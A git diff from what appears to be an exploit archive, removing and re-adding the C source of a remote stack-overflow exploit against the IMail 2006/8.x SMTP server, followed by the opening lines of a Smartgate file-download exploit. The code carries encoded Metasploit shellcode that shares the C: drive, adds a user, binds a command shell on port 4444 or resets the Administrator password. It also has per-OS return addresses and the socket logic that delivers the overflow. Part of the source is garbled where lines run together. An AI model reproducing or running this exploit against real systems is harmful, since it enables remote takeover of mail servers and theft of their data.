-"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";
-
-/* win32_adduser -  PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */
-unsigned char AddUser[] =
-"\x2b\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
-"\xe6\xaf\x6a\x83\xeb\xfc\xe2\xf4\x4e\x0e\xeb\x6a\xb2\xe6\x24\x2f"
-"\x8e\x6d\xd3\x6f\xca\xe7\x40\xe1\xfd\xfe\x24\x35\x92\xe7\x44\x23"
-"\x39\xd2\x24\x6b\x5c\xd7\x6f\xf3\x1e\x62\x6f\x1e\xb5\x27\x65\x67"
-"\xb3\x24\x44\x9e\x89\xb2\x8b\x6e\xc7\x03\x24\x35\x96\xe7\x44\x0c"
-"\x39\xea\xe4\xe1\xed\xfa\xae\x81\x39\xfa\x24\x6b\x59\x6f\xf3\x4e"
-"\xb6\x25\x9e\xaa\xd6\x6d\xef\x5a\x37\x26\xd7\x66\x39\xa6\xa3\xe1"
-"\xc2\xfa\x02\xe1\xda\xee\x44\x63\x39\x66\x1f\x6a\xb2\xe6\x24\x02"
-"\x8e\xb9\x9e\x9c\xd2\xb0\x26\x92\x31\x26\xd4\x3a\xda\x16\x25\x6e"
-"\xed\x8e\x37\x94\x38\xe8\xf8\x95\x55\x85\xc2\x0e\x9c\x83\xd7\x0f"
-"\x92\xc9\xcc\x4a\xdc\x83\xdb\x4a\xc7\x95\xca\x18\x92\xa3\xdd\x18"
-"\xdd\x94\x8f\x2f\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xc6\x89\x4c"
-"\x92\x88\xca\x1e\x92\x8a\xc0\x09\xd3\x8a\xc8\x18\xdd\x93\xdf\x4a"
-"\xf3\x82\xc2\x03\xdc\x8f\xdc\x1e\xc0\x87\xdb\x05\xc0\x95\x8f\x2f"
-"\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xe6\xaf\x6a";
-
-/* win32_exec -  CMD=net user Administrator "p@ssw0rd" Size=187 Encoder=Pex http://metasploit.com */
-unsigned char ChangeAdmin[] =
-"\x29\xc9\x83\xe9\xda\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x74"
-"\xb8\x4f\xba\x83\xee\xfc\xe2\xf4\x88\x50\x0b\xba\x74\xb8\xc4\xff"
-"\x48\x33\x33\xbf\x0c\xb9\xa0\x31\x3b\xa0\xc4\xe5\x54\xb9\xa4\xf3"
-"\xff\x8c\xc4\xbb\x9a\x89\x8f\x23\xd8\x3c\x8f\xce\x73\x79\x85\xb7"
-"\x75\x7a\xa4\x4e\x4f\xec\x6b\xbe\x01\x5d\xc4\xe5\x50\xb9\xa4\xdc"
-"\xff\xb4\x04\x31\x2b\xa4\x4e\x51\xff\xa4\xc4\xbb\x9f\x31\x13\x9e"
-"\x70\x7b\x7e\x7a\x10\x33\x0f\x8a\xf1\x78\x37\xb6\xff\xf8\x43\x31"
-"\x04\xa4\xe2\x31\x1c\xb0\xa4\xb3\xff\x38\xff\xba\x74\xb8\xc4\xd2"
-"\x48\xe7\x7e\x4c\x14\xee\xc6\x42\xf7\x78\x34\xea\x1c\x48\xc5\xbe"
-"\x2b\xd0\xd7\x44\xfe\xb6\x18\x45\x93\xd6\x2a\xce\x54\xcd\x3c\xdf"
-"\x06\x98\x0b\xc8\x15\xd3\x2a\x9a\x5b\xd9\x2b\xde\x74\xb8\x4f\xba";
-
-
-   WSADATA wsaData;
-
-   struct hostent *hp;
-   struct sockaddr_in sockin;
-   char buf[300], *check;
-   int sockfd, bytes;
-   int plen, i, JMP;
-   char *hostname;
-   unsigned short port;
-
-   printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit\n");
-   printf("Coded by Greg Linares < glinares.code  [at] GMAIL [dot] com >\n");
-   if (argc <= 1)
-   {
-		printf("Usage: %s [hostname] [port]  \n", argv[0]);
-      	printf("Default port is 25 \r\n");
-		printf("==============================\n");
-	  	printf("Payload Options: 1 = Default\n");
-		printf("==============================\n");
-	  	printf("1 = Share C:\\ as 'Export' Share\n");
-	  	printf("2 = Add User 'Error' with Password 'Error'\n");
-	  	printf("3 = Win32 Bind CMD to Port 4444\n");
-		printf("4 = Change Administrator Password to 'p@ssw0rd'\n");
-		printf("==============================\n");
-	  	printf("JMP Options: 1 = Default\n");
-		printf("==============================\n");
-	  	printf("1 = IMAIL 8.x SMTPDLL.DLL	   [pop ebp, ret] 0x10036f71 \n");
-		printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af \n");
-		printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 \n");
-		printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 \n");
-		printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c \n");
-		printf("6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 \n");
-		printf("7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 \n");
-		printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 \r\n");
-
-      exit(0);
-   	}
-
-   	hostname = argv[1];
-   	if (argv[2]) port = atoi(argv[2]);
-   		else port = atoi("25");
-   	if (argv[4]) JMP = atoi(argv[4]);
-		else JMP = atoi("1");
-
-   	if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
-   	{
-    	fprintf(stderr, "Error setting up with WinSock v1.1\n");
-      	exit(-1);
-   	}
-
-
-   	hp = gethostbyname(hostname);
-   	if (hp == NULL)
-   	{
-      	printf("ERROR: Uknown host %s\n", hostname);
-	  	printf("%s",hostname);
-      	exit(-1);
-   	}
-
-   	sockin.sin_family = hp->h_addrtype;
-   	sockin.sin_port = htons(port);
-   	sockin.sin_addr = *((struct in_addr *)hp->h_addr);
-
-   	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
-   	{
-      	printf("ERROR: Socket Error\n");
-      	exit(-1);
-   	}
-
-   	if ((connect(sockfd, (struct sockaddr *) &sockin,
-                sizeof(sockin))) == SOCKET_ERROR)
-   	{
-      	printf("ERROR: Connect Error\n");
-      	closesocket(sockfd);
-      	WSACleanup();
-      	exit(-1);
-   	}
-
-   	printf("Connected to [%s] on port [%d], sending overflow....\n",
-          hostname, port);
-
-
-   	if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
-   	{
-      	printf("ERROR: Recv Error\n");
-      	closesocket(sockfd);
-      	WSACleanup();
-      	exit(1);
-   	}
-
-   	/* wait for SMTP service welcome*/
-   	buf[bytes] = '\0';
-   	check = strstr(buf, "220");
-   	if (check == NULL)
-   	{
-      	printf("ERROR: NO  response from SMTP service\n");
-      	closesocket(sockfd);
-      	WSACleanup();
-      	exit(-1);
-   	}
-
-
-   // JMP to EAX = Results in a Corrupted Stack
-   // so instead we POP EBP, RET to restore pointer and then return
-   // this causes code procedure to continue
-   /*
-   		['IMail 8.x Universal', 0x10036f71 ],
-		['Windows 2003 SP1 English', 0x7c87d8af ],
-		['Windows 2003 SP0 English', 0x77d5c14c ],
-		['Windows XP SP2 English', 0x7c967e23 ],
-		['Windows XP SP1 English', 0x71ab389c ],
-		['Windows XP SP0 English', 0x71ab389c ],
-		['Windows 2000 Universal English', 0x75021397 ],
-		['Windows 2000 Universal French', 0x74fa1397],
-		['Windows XP SP1 - SP2 German', 0x77d18c14],
-	*/
-   	char Exp[] = "RCPT TO: <@";						// This stores our JMP between the @ and :
-   	char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:";		//Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
-  	char WinXPSP2E[] = "\x23\x7e\x96\x7c:";			//WinXP SP2 English  NTDLL.DLL [pop ebp, ret] 0x7c967e23
-   	char IMail815[] = "\x71\x6f\x03\x10:"; 			//IMAIL 8.15 SMTPDLL.DLL	   [pop ebp, ret] 0x10036f71
-	char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:";		//Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c
-	char WinXPSP2[] = "\x23\x7e\x96\x7c:";			//WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23
-	char WinXPSP1[] = "\x9c\x38\xab\x71:";			//WinXP SP1 and 0 English U32	[pop ebp, ret]0x71ab389c
-	char Win2KE[] = "\x97\x31\x02\x75:";			//Win2k English All SPs			[pop ebp, ret]0x75021397
-	char Win2KF[] = "\x97\x13\xfa\x74:";			// As above except French Win2k	[pop ebp, ret]0x74fa1397
-	char WinXPG[] = "\x14\x8c\xd1\x77:";			//WinXP SP1 - SP2 German U32    [pop ebp, ret]0x77d18c14
-
-	char tail[] = "SSS>\n";							// This closes the RCPT cmd.  Any characters work.
-	// Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems
-	// After around 560 bytes or so EIP gets overwritten.  But this method is easier to exploit and it works
-	// On all versions from 8.x to 2006 (9.x?)
-	char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44";	// Stabolize Stack prior to payload.
-   	memset(overflow, 0, 1028);
-   	strcat(overflow, Exp);
-	if (JMP == 1)
-	{
-		printf("Using IMail 8.15 SMTDP.DLL JMP\n");
-		strcat(overflow, IMail815);
-	} else if (JMP == 2)
-	{
-		printf("Using Win2003 SP1 NTDLL.DLL JMP\n");
-		strcat(overflow, Win2k3SP1E);
-	} else if (JMP == 3)
-	{
-		printf("Using Win2003 SP0 USER32.DLL JMP\n");
-		strcat(overflow, Win2k3SP0E);
-	} else if (JMP == 4)
-	{
-		printf("Using WinXP SP2 NTDLL.DLL JMP\n");
-		strcat(overflow, WinXPSP2E);
-	} else if (JMP == 5)
-	{
-		printf("Using WinXP SP1 and SP0 USER32.DLL JMP\n");
-		strcat(overflow, WinXPSP1);
-	} else if (JMP == 6)
-	{
-		printf("Using Win2000 Universal English USER32.DLL JMP\n");
-		strcat(overflow, Win2KE);
-	} else if (JMP == 7)
-	{
-		printf("Using Win2000 Universal French USER32.DLL JMP\n");
-		strcat(overflow, Win2KF);
-	} else if (JMP == 8)
-	{
-		printf("Using WinXP SP2 and SP1 German USER32.DLL JMP\n");
-		strcat(overflow, WinXPG);
-	} else {
-		printf("Using IMail 8.15 SMTDP.DLL JMP\n");
-		strcat(overflow, IMail815);
-	}
-		
-
-
-    // Setup Payload Options
-	if (atoi(argv[3]) == 1)
-	{
-		printf("Using Root Share Payload\n");
-		plen = 544 - ((strlen(RootShare) + strlen(StackS)));
-		for (i=0; ih_addrtype;
-   	sockin.sin_port = htons(port);
-   	sockin.sin_addr = *((struct in_addr *)hp->h_addr);
-
-   	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
-   	{
-      	printf("ERROR: Socket Error\n");
-      	exit(-1);
-   	}
-
-   	if ((connect(sockfd, (struct sockaddr *) &sockin,
-                sizeof(sockin))) == SOCKET_ERROR)
-   	{
-      	printf("Exploit Successfully Delivered!\n");
-		closesocket(sockfd);
-		WSACleanup();
-		printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
-		exit(0);
-   	}
-	printf("...");
-	if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
-   	{
-      	printf("Exploit Successfully Delivered!\n");
-		closesocket(sockfd);
-		WSACleanup();
-		printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
-		exit(0);
-   	}
-
-   	/* wait for SMTP service welcome*/
-   	buf[bytes] = '\0';
-   	check = strstr(buf, "220");
-   	if (check == NULL)
-   	{
-      	printf("Exploit Successfully Delivered!\n");
-		closesocket(sockfd);
-		WSACleanup();
-		printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
-		exit(0);
-   	}
-
-	printf("Exploit Failed: Try A different JMP Method or Payload\n");
-	closesocket(sockfd);
-  	WSACleanup();
-  	exit (1);
-}
-
-// milw0rm.com [2006-10-19]
+// IMail 2006 and 8.x SMTP Stack Overflow Exploit
+// coded by Greg Linares [glinares.code[at]gmail[dot]com
+// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html
+// This works on the following versions:
+// 2006 IMail prior to 2006.1 update
+
+
+#include 
+#include 
+#include 
+#include 
+
+#pragma comment(lib,"wsock32.lib")
+
+int main(int argc, char *argv[])
+{
+static char overflow[1028];
+
+
+
+// PAYLOADS
+// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More)
+
+/* win32_exec -  EXITFUNC=seh CMD=net share Export=C:\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */
+unsigned char RootShare[] =
+"\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x74\x24\xf4\x58"
+"\x31\x50\x17\x83\xc0\x04\x03\xaa\xfc\xa5\xde\xb6\xeb\x6e\x21\x46"
+"\xec\xe5\x64\x7a\x67\x85\x63\xfa\x76\x99\xe7\xb5\x60\xee\xa7\x69"
+"\x90\x1b\x1e\xe2\xa6\x50\xa0\x1a\xf7\xa6\x3a\x4e\x7c\xe6\x49\x89"
+"\xbc\x2d\xbc\x94\xfc\x59\x4b\xad\x54\xba\xb0\xa4\xb1\x49\xe7\x62"
+"\x3b\xa5\x7e\xe1\x37\x72\xf4\xaa\x5b\x85\xe1\xdf\x78\x0e\xf4\x34"
+"\x09\x4c\xd3\xce\xc9\x5c\xdb\xaa\x46\xde\xeb\xb7\x99\xa7\x07\x3c"
+"\x59\x54\x93\x32\x46\xc9\x28\xda\x7e\xfa\x26\x91\xff\x4c\x38\xa5"
+"\xff\x27\x51\x99\xa0\x06\x54\x81\x08\xe0\x60\xc2\x75\x89\xc0\xac"
+"\x85\xe4\xe5\x73\x0e\x61\x1b\x01\xc0\xc6\x1b\xf2\xb3\x8d\x97\xdc"
+"\x38\x26\x39\x6e\xda\x96\xfc\xf6\x54\xb8\x8c\x72\xa8\x05\x4b\x26"
+"\xf2\xa6\xde\xb8\x9e\xd1\x4d\x2d\x2b\x47\xea\xad";
+
+
+/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
+unsigned char Win32Bind[] =
+"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93"
+"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9"
+"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd"
+"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf"
+"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e"
+"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd"
+"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd"
+"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66"
+"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6"
+"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34"
+"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65"
+"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7"
+"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e"
+"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f"
+"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61"
+"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66"
+"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b"
+"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9"
+"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67"
+"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6"
+"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69"
+"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";
+
+/* win32_adduser -  PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */
+unsigned char AddUser[] =
+"\x2b\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
+"\xe6\xaf\x6a\x83\xeb\xfc\xe2\xf4\x4e\x0e\xeb\x6a\xb2\xe6\x24\x2f"
+"\x8e\x6d\xd3\x6f\xca\xe7\x40\xe1\xfd\xfe\x24\x35\x92\xe7\x44\x23"
+"\x39\xd2\x24\x6b\x5c\xd7\x6f\xf3\x1e\x62\x6f\x1e\xb5\x27\x65\x67"
+"\xb3\x24\x44\x9e\x89\xb2\x8b\x6e\xc7\x03\x24\x35\x96\xe7\x44\x0c"
+"\x39\xea\xe4\xe1\xed\xfa\xae\x81\x39\xfa\x24\x6b\x59\x6f\xf3\x4e"
+"\xb6\x25\x9e\xaa\xd6\x6d\xef\x5a\x37\x26\xd7\x66\x39\xa6\xa3\xe1"
+"\xc2\xfa\x02\xe1\xda\xee\x44\x63\x39\x66\x1f\x6a\xb2\xe6\x24\x02"
+"\x8e\xb9\x9e\x9c\xd2\xb0\x26\x92\x31\x26\xd4\x3a\xda\x16\x25\x6e"
+"\xed\x8e\x37\x94\x38\xe8\xf8\x95\x55\x85\xc2\x0e\x9c\x83\xd7\x0f"
+"\x92\xc9\xcc\x4a\xdc\x83\xdb\x4a\xc7\x95\xca\x18\x92\xa3\xdd\x18"
+"\xdd\x94\x8f\x2f\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xc6\x89\x4c"
+"\x92\x88\xca\x1e\x92\x8a\xc0\x09\xd3\x8a\xc8\x18\xdd\x93\xdf\x4a"
+"\xf3\x82\xc2\x03\xdc\x8f\xdc\x1e\xc0\x87\xdb\x05\xc0\x95\x8f\x2f"
+"\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xe6\xaf\x6a";
+
+/* win32_exec -  CMD=net user Administrator "p@ssw0rd" Size=187 Encoder=Pex http://metasploit.com */
+unsigned char ChangeAdmin[] =
+"\x29\xc9\x83\xe9\xda\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x74"
+"\xb8\x4f\xba\x83\xee\xfc\xe2\xf4\x88\x50\x0b\xba\x74\xb8\xc4\xff"
+"\x48\x33\x33\xbf\x0c\xb9\xa0\x31\x3b\xa0\xc4\xe5\x54\xb9\xa4\xf3"
+"\xff\x8c\xc4\xbb\x9a\x89\x8f\x23\xd8\x3c\x8f\xce\x73\x79\x85\xb7"
+"\x75\x7a\xa4\x4e\x4f\xec\x6b\xbe\x01\x5d\xc4\xe5\x50\xb9\xa4\xdc"
+"\xff\xb4\x04\x31\x2b\xa4\x4e\x51\xff\xa4\xc4\xbb\x9f\x31\x13\x9e"
+"\x70\x7b\x7e\x7a\x10\x33\x0f\x8a\xf1\x78\x37\xb6\xff\xf8\x43\x31"
+"\x04\xa4\xe2\x31\x1c\xb0\xa4\xb3\xff\x38\xff\xba\x74\xb8\xc4\xd2"
+"\x48\xe7\x7e\x4c\x14\xee\xc6\x42\xf7\x78\x34\xea\x1c\x48\xc5\xbe"
+"\x2b\xd0\xd7\x44\xfe\xb6\x18\x45\x93\xd6\x2a\xce\x54\xcd\x3c\xdf"
+"\x06\x98\x0b\xc8\x15\xd3\x2a\x9a\x5b\xd9\x2b\xde\x74\xb8\x4f\xba";
+
+
+   WSADATA wsaData;
+
+   struct hostent *hp;
+   struct sockaddr_in sockin;
+   char buf[300], *check;
+   int sockfd, bytes;
+   int plen, i, JMP;
+   char *hostname;
+   unsigned short port;
+
+   printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit\n");
+   printf("Coded by Greg Linares < glinares.code  [at] GMAIL [dot] com >\n");
+   if (argc <= 1)
+   {
+		printf("Usage: %s [hostname] [port]  \n", argv[0]);
+      	printf("Default port is 25 \r\n");
+		printf("==============================\n");
+	  	printf("Payload Options: 1 = Default\n");
+		printf("==============================\n");
+	  	printf("1 = Share C:\\ as 'Export' Share\n");
+	  	printf("2 = Add User 'Error' with Password 'Error'\n");
+	  	printf("3 = Win32 Bind CMD to Port 4444\n");
+		printf("4 = Change Administrator Password to 'p@ssw0rd'\n");
+		printf("==============================\n");
+	  	printf("JMP Options: 1 = Default\n");
+		printf("==============================\n");
+	  	printf("1 = IMAIL 8.x SMTPDLL.DLL	   [pop ebp, ret] 0x10036f71 \n");
+		printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af \n");
+		printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 \n");
+		printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 \n");
+		printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c \n");
+		printf("6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 \n");
+		printf("7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 \n");
+		printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 \r\n");
+
+      exit(0);
+   	}
+
+   	hostname = argv[1];
+   	if (argv[2]) port = atoi(argv[2]);
+   		else port = atoi("25");
+   	if (argv[4]) JMP = atoi(argv[4]);
+		else JMP = atoi("1");
+
+   	if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
+   	{
+    	fprintf(stderr, "Error setting up with WinSock v1.1\n");
+      	exit(-1);
+   	}
+
+
+   	hp = gethostbyname(hostname);
+   	if (hp == NULL)
+   	{
+      	printf("ERROR: Uknown host %s\n", hostname);
+	  	printf("%s",hostname);
+      	exit(-1);
+   	}
+
+   	sockin.sin_family = hp->h_addrtype;
+   	sockin.sin_port = htons(port);
+   	sockin.sin_addr = *((struct in_addr *)hp->h_addr);
+
+   	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
+   	{
+      	printf("ERROR: Socket Error\n");
+      	exit(-1);
+   	}
+
+   	if ((connect(sockfd, (struct sockaddr *) &sockin,
+                sizeof(sockin))) == SOCKET_ERROR)
+   	{
+      	printf("ERROR: Connect Error\n");
+      	closesocket(sockfd);
+      	WSACleanup();
+      	exit(-1);
+   	}
+
+   	printf("Connected to [%s] on port [%d], sending overflow....\n",
+          hostname, port);
+
+
+   	if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
+   	{
+      	printf("ERROR: Recv Error\n");
+      	closesocket(sockfd);
+      	WSACleanup();
+      	exit(1);
+   	}
+
+   	/* wait for SMTP service welcome*/
+   	buf[bytes] = '\0';
+   	check = strstr(buf, "220");
+   	if (check == NULL)
+   	{
+      	printf("ERROR: NO  response from SMTP service\n");
+      	closesocket(sockfd);
+      	WSACleanup();
+      	exit(-1);
+   	}
+
+
+   // JMP to EAX = Results in a Corrupted Stack
+   // so instead we POP EBP, RET to restore pointer and then return
+   // this causes code procedure to continue
+   /*
+   		['IMail 8.x Universal', 0x10036f71 ],
+		['Windows 2003 SP1 English', 0x7c87d8af ],
+		['Windows 2003 SP0 English', 0x77d5c14c ],
+		['Windows XP SP2 English', 0x7c967e23 ],
+		['Windows XP SP1 English', 0x71ab389c ],
+		['Windows XP SP0 English', 0x71ab389c ],
+		['Windows 2000 Universal English', 0x75021397 ],
+		['Windows 2000 Universal French', 0x74fa1397],
+		['Windows XP SP1 - SP2 German', 0x77d18c14],
+	*/
+   	char Exp[] = "RCPT TO: <@";						// This stores our JMP between the @ and :
+   	char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:";		//Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
+  	char WinXPSP2E[] = "\x23\x7e\x96\x7c:";			//WinXP SP2 English  NTDLL.DLL [pop ebp, ret] 0x7c967e23
+   	char IMail815[] = "\x71\x6f\x03\x10:"; 			//IMAIL 8.15 SMTPDLL.DLL	   [pop ebp, ret] 0x10036f71
+	char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:";		//Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c
+	char WinXPSP2[] = "\x23\x7e\x96\x7c:";			//WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23
+	char WinXPSP1[] = "\x9c\x38\xab\x71:";			//WinXP SP1 and 0 English U32	[pop ebp, ret]0x71ab389c
+	char Win2KE[] = "\x97\x31\x02\x75:";			//Win2k English All SPs			[pop ebp, ret]0x75021397
+	char Win2KF[] = "\x97\x13\xfa\x74:";			// As above except French Win2k	[pop ebp, ret]0x74fa1397
+	char WinXPG[] = "\x14\x8c\xd1\x77:";			//WinXP SP1 - SP2 German U32    [pop ebp, ret]0x77d18c14
+
+	char tail[] = "SSS>\n";							// This closes the RCPT cmd.  Any characters work.
+	// Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems
+	// After around 560 bytes or so EIP gets overwritten.  But this method is easier to exploit and it works
+	// On all versions from 8.x to 2006 (9.x?)
+	char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44";	// Stabolize Stack prior to payload.
+   	memset(overflow, 0, 1028);
+   	strcat(overflow, Exp);
+	if (JMP == 1)
+	{
+		printf("Using IMail 8.15 SMTDP.DLL JMP\n");
+		strcat(overflow, IMail815);
+	} else if (JMP == 2)
+	{
+		printf("Using Win2003 SP1 NTDLL.DLL JMP\n");
+		strcat(overflow, Win2k3SP1E);
+	} else if (JMP == 3)
+	{
+		printf("Using Win2003 SP0 USER32.DLL JMP\n");
+		strcat(overflow, Win2k3SP0E);
+	} else if (JMP == 4)
+	{
+		printf("Using WinXP SP2 NTDLL.DLL JMP\n");
+		strcat(overflow, WinXPSP2E);
+	} else if (JMP == 5)
+	{
+		printf("Using WinXP SP1 and SP0 USER32.DLL JMP\n");
+		strcat(overflow, WinXPSP1);
+	} else if (JMP == 6)
+	{
+		printf("Using Win2000 Universal English USER32.DLL JMP\n");
+		strcat(overflow, Win2KE);
+	} else if (JMP == 7)
+	{
+		printf("Using Win2000 Universal French USER32.DLL JMP\n");
+		strcat(overflow, Win2KF);
+	} else if (JMP == 8)
+	{
+		printf("Using WinXP SP2 and SP1 German USER32.DLL JMP\n");
+		strcat(overflow, WinXPG);
+	} else {
+		printf("Using IMail 8.15 SMTDP.DLL JMP\n");
+		strcat(overflow, IMail815);
+	}
+		
+
+
+    // Setup Payload Options
+	if (atoi(argv[3]) == 1)
+	{
+		printf("Using Root Share Payload\n");
+		plen = 544 - ((strlen(RootShare) + strlen(StackS)));
+		for (i=0; ih_addrtype;
+   	sockin.sin_port = htons(port);
+   	sockin.sin_addr = *((struct in_addr *)hp->h_addr);
+
+   	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
+   	{
+      	printf("ERROR: Socket Error\n");
+      	exit(-1);
+   	}
+
+   	if ((connect(sockfd, (struct sockaddr *) &sockin,
+                sizeof(sockin))) == SOCKET_ERROR)
+   	{
+      	printf("Exploit Successfully Delivered!\n");
+		closesocket(sockfd);
+		WSACleanup();
+		printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
+		exit(0);
+   	}
+	printf("...");
+	if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
+   	{
+      	printf("Exploit Successfully Delivered!\n");
+		closesocket(sockfd);
+		WSACleanup();
+		printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
+		exit(0);
+   	}
+
+   	/* wait for SMTP service welcome*/
+   	buf[bytes] = '\0';
+   	check = strstr(buf, "220");
+   	if (check == NULL)
+   	{
+      	printf("Exploit Successfully Delivered!\n");
+		closesocket(sockfd);
+		WSACleanup();
+		printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
+		exit(0);
+   	}
+
+	printf("Exploit Failed: Try A different JMP Method or Payload\n");
+	closesocket(sockfd);
+  	WSACleanup();
+  	exit (1);
+}
+
+// milw0rm.com [2006-10-19]
diff --git a/platforms/windows/remote/2637.c b/platforms/windows/remote/2637.c
index 0bc842c69..a39a5fbb0 100755
--- a/platforms/windows/remote/2637.c
+++ b/platforms/windows/remote/2637.c
@@ -1,219 +1,219 @@
-/* prdelka-vs-AEP-smartgate
- * ========================
- * Smartgate is an application layer security gateway that meets FIPS 140-2
- * requirements for large-scale networked environments for IP-based Networks.
- * AEP provide network solutions for government, law enforcement, homeland security,
- * public safety, criminal intelligence and much more.
- * 
- * A vulnerability exists in the smartgate SSL server (listens on port 443 by default)
- * which may allow a malicious user to download arbitrary files with the priviledges
- * of the smartgate server. 
- *
- * By analyzing the returned HTTP header response, an attacker can also test for the 
- * existance of a remote directory. Remote directories return a "Moved Permanently" 
- * error, as opposed to a 404, as shown below.
- * 
